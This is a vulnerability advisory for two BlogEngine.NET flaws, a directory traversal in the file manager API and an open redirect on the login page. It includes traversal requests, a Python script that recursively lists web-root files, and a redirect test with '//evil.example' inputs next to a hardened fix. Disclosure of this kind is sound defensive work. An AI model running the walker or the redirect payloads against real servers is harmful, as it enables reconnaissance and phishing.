Directory Traversal & Listing; Login Page Unvalidated Redirect

Author: Aaron Bishop


A directory traversal, CVE-2019-10717, was identified in BlogEngine.NET versions 3.3.7 and earlier in the /api/filemanager endpoint. The issue reveals the contents of directories outside the intended ~/App_Data/files folder, including the web root. Authentication is required to exploit it.

Vendor Patch


  • Identified: 30 Mar 2019
  • Initial Developer Contact: 31 Mar 2019
  • Issue Disclosed: 24 Jun 2019


File Manager is used by the application to show the contents of ~/App_Data/files and sub-directories in the UI. Submitting requests directly to /api/filemanager with a modified path parameter reveals directory contents beyond ~/App_Data/files.

A request to /api/filemanager?path=%2F..%2f..%2f (the path decodes to /../../) returns the contents of the web root; one entry from the response:


    {
      "IsChecked": false,
      "SortOrder": 25,
      "Created": "5/26/2018 1:53:02 PM",
      "Name": "Web.config",
      "FileSize": "19.41 kb",
      "FileType": 1,
      "FullPath": "/../../Web.config",
      "ImgPlaceholder": "fa fa-file-o"
    }

The contents of other directories are revealed by changing the path parameter in the same way; for example, listing the Content directory returns entries such as:


    {
      "IsChecked": false,
      "SortOrder": 15,
      "Created": "3/30/2019 9:09:23 PM",
      "Name": "toastr.scss",
      "FileSize": "6.92 kb",
      "FileType": 1,
      "FullPath": "/../../Content/toastr.scss",
      "ImgPlaceholder": "fa fa-file-o"
    }

This issue could be exploited to confirm that files uploaded in preparation for an RCE attack landed where expected, or to enumerate file names worth retrieving through an XXE.


The accompanying script generates a list of all files in the web root when run as:

python -t $HOST
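The following walker is an added example written for this post; it is not the script invoked above and not BlogEngine.NET code. It drives /api/filemanager with the same /../../ prefix and recursively lists everything the endpoint returns. Assumptions the post does not confirm: the endpoint returns a JSON array of entries; "FileType": 1 marks a file (as in the responses above) and any other value marks a directory; the authenticated session is supplied as a raw Cookie header value. The host, cookie and sample responses in the block are constructed placeholders, and the offline sample fetcher exists only so the walker can be exercised without a target.

```python
"""
Recursive lister for the BlogEngine.NET /api/filemanager traversal
(CVE-2019-10717). Added example for this post; not the post's own script and
not BlogEngine.NET code. Assumptions (not confirmed by the post): the endpoint
returns a JSON array of entries; "FileType" == 1 marks a file and any other
value a directory; the session is passed as a raw Cookie header value.
"""
import json
import sys
import urllib.parse
import urllib.request
from typing import Callable, List

FILE_TYPE_FILE = 1          # observed in the post's responses
TRAVERSAL_ROOT = "/../../"  # the prefix the post used to reach the web root

Fetcher = Callable[[str], List[dict]]


def http_fetcher(host: str, cookie: str, scheme: str = "http") -> Fetcher:
    """Build a fetcher that GETs /api/filemanager?path=<p> with the session cookie."""
    def fetch(path: str) -> List[dict]:
        url = "%s://%s/api/filemanager?path=%s" % (
            scheme, host, urllib.parse.quote(path, safe=""))
        req = urllib.request.Request(
            url, headers={"Cookie": cookie, "Accept": "application/json"})
        with urllib.request.urlopen(req, timeout=15) as resp:
            return json.loads(resp.read().decode("utf-8"))
    return fetch


def walk(fetch: Fetcher, root: str = TRAVERSAL_ROOT, max_depth: int = 8) -> List[str]:
    """Breadth-first walk from `root`; returns the sorted FullPath of every file."""
    files: List[str] = []
    seen = set()
    queue = [(root, 0)]
    while queue:
        path, depth = queue.pop(0)
        if path in seen or depth > max_depth:
            continue
        seen.add(path)
        for entry in fetch(path):
            name = entry.get("Name", "")
            if name in ("", ".", ".."):
                continue
            full = entry.get("FullPath") or path.rstrip("/") + "/" + name
            if entry.get("FileType") == FILE_TYPE_FILE:
                files.append(full)
            else:  # assumed: any non-file entry is a directory worth descending into
                queue.append((full.rstrip("/") + "/", depth + 1))
    return sorted(files)


# Constructed sample responses shaped like the post's JSON (not real captures).
SAMPLE_LISTING = {
    "/../../": [
        {"Name": "Web.config", "FileType": 1, "FullPath": "/../../Web.config"},
        {"Name": "Content", "FileType": 0, "FullPath": "/../../Content"},
    ],
    "/../../Content/": [
        {"Name": "toastr.scss", "FileType": 1, "FullPath": "/../../Content/toastr.scss"},
    ],
}


def sample_fetcher(path: str) -> List[dict]:
    """Offline stand-in for http_fetcher, serving the constructed listing above."""
    return SAMPLE_LISTING.get(path, [])


if __name__ == "__main__":
    # usage: python walker.py <host> '<cookie header value>'; with no arguments the
    # constructed sample listing is walked instead of a live target
    fetcher = http_fetcher(sys.argv[1], sys.argv[2]) if len(sys.argv) == 3 else sample_fetcher
    for f in walk(fetcher):
        print(f)
```

The depth limit and the seen-set matter in practice: a listing that includes "." or ".." entries, or symlinked directories, would otherwise loop forever. Each request goes to the authenticated endpoint, so the cookie must be a valid logged-in session, as the post notes.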


An unvalidated redirect, CVE-2019-10721, exists in BlogEngine.NET versions 3.3.7 and earlier on login.aspx. An attacker can use it to send users who attempt to log in to the application to an external, potentially malicious, site.

Vendor Patch


  • Identified: 30 Mar 2019
  • Initial Developer Contact: 31 Mar 2019
  • Issue Disclosed: 24 Jun 2019


The ReturnURL parameter can be set to an external URL. If a user clicks a link with a malicious ReturnURL, such as http://$RHOST/Account/login.aspx?ReturnURL=//, the user will be redirected to the malicious site after successfully logging in to the application. The following request demonstrates the behavior:

POST /Account/login.aspx? HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://$RHOST/Account/login.aspx?ReturnURL=//
Cookie: COOKIES 
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 576


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: COOKIE
X-Powered-By: ASP.NET
Date: Thu, 04 Apr 2019 17:33:07 GMT
Connection: close
Content-Length: 137

<html><head><title>Object moved</title></head><body>
<h3>Object moved to <a href="">here</a>.</h3>

This behavior can be traced to:


    // ignore Return URLs not beginning with a forward slash, such as remote sites.
    if (string.IsNullOrWhiteSpace(returnUrl) || !returnUrl.StartsWith("/"))
        returnUrl = null;

    if (!string.IsNullOrWhiteSpace(returnUrl))
    {
        context.Response.Redirect(returnUrl);
    }
    else
    {
        context.Response.Redirect(Utils.RelativeWebRoot);
    }

The application accepts any ReturnURL that begins with /. A URL beginning with // is a protocol-relative URL: browsers resolve it to the named host using the same scheme as the current page, so it points to an external site. Because it still starts with /, // satisfies the check above and the user is redirected off-site after logging in.
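To make the check concrete, here is an added Python model of the decision logic shown above beside a hardened version. It was written for this post and is not BlogEngine.NET code (the project is C#; the function names below are hypothetical). The hardened check follows the rule ASP.NET MVC applies in UrlHelper.IsLocalUrl: accept "/" or "/path" only when the second character is neither "/" nor "\" (browsers treat "/\host" the same as "//host"), accept app-relative "~/" paths, and send everything else to the web root. The web root value and the test inputs are placeholders.

```python
"""
Model of the BlogEngine.NET login ReturnURL check (CVE-2019-10721) next to a
hardened replacement. Added example for this post, not the project's C# code;
function names are hypothetical and WEB_ROOT stands in for Utils.RelativeWebRoot.
"""

WEB_ROOT = "/"  # assumption: the application's relative web root


def vulnerable_redirect_target(return_url, web_root=WEB_ROOT):
    """The check shown in the post: any value starting with '/' is trusted,
    which lets the scheme-relative '//host' through."""
    if return_url is None or return_url.strip() == "" or not return_url.startswith("/"):
        return web_root
    return return_url


def is_local_url(url):
    """Hardened check modelled on ASP.NET MVC's UrlHelper.IsLocalUrl.

    Local means: exactly '/', or '/x...' where the second character is neither
    '/' nor '\\' (browsers treat '/\\host' like '//host'), or an app-relative
    '~/x...' path. Control characters are rejected outright because some
    clients strip them before parsing, which could turn '/\\t/host' into '//host'.
    """
    if not url:
        return False
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in url):
        return False
    if url[0] == "/":
        return len(url) == 1 or url[1] not in "/\\"
    if url[0] == "~":
        return len(url) > 1 and url[1] == "/"
    return False


def hardened_redirect_target(return_url, web_root=WEB_ROOT):
    """Redirect to return_url only if it is local; otherwise fall back to web_root."""
    return return_url if is_local_url(return_url) else web_root


if __name__ == "__main__":
    # Constructed inputs; "evil.example" is a placeholder host, not one from the post.
    for candidate in ["/admin/", "//evil.example", "/\\evil.example",
                      "http://evil.example/", "~/post.aspx", "", None]:
        print("%-22r vulnerable -> %-18r hardened -> %r" % (
            candidate,
            vulnerable_redirect_target(candidate),
            hardened_redirect_target(candidate)))
```

The difference shows up on exactly the inputs the post is about: the original check passes "//evil.example" through to Response.Redirect, while the hardened check sends it to the web root. An allow-list comparison against the application's own host would also work, but the second-character rule is simpler and does not depend on Host header handling.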
